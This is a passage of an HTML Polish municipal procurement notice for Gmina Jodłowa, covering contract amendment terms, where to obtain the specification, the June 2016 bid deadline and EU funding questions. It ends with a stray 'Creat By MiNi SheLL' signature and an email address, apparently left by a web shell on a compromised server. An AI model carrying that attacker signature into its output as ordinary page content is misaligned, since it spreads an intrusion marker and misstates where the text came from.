- W przypadku zaistnienia istotnych okoliczności powodujących, że wykonanie umowy w zakresie przewidzianym w dokumentacji projektowej nie jest możliwe, czego nie można było przewidzieć w chwili zawarcia umowy
- Wykonanie świadczeń zamiennych (robót zamiennych), których wykonanie nie będzie wykraczało poza zakres określony w ofercie i nie zmieni wynagrodzenia wykonawcy 
- zmniejszenia zakresu rzeczowego w przypadku stwierdzenia przez projektanta braku konieczności wykonywania zaprojektowanych robót 
- w przypadku rezygnacji przez Zamawiającego z realizacji części przedmiotu umowy, przysługujące wykonawcy wynagrodzenie zostanie pomniejszone przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami
G. Zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron.
Warunki nieistotne, w szczególności:
- wystąpienie omyłek pisarskich i rachunkowych;
- zmiany formy organizacyjnej Wykonawcy (przekształcenie itp.);
- zmiany osób nadzorujących wykonanie przedmiotu umowy;
- zmiany obowiązujących przepisów prawa;
- inne, które w sposób istotny nie będą ingerować w przedmiot umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugjodlowa.itl.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Jodłowa 39-225 Jodłowa 1A woj. podkarpackie pok. nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.06.2016 godzina 10:45, miejsce: Urząd Gminy Jodłowa 39-225 Jodłowa 1A woj. podkarpackie sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com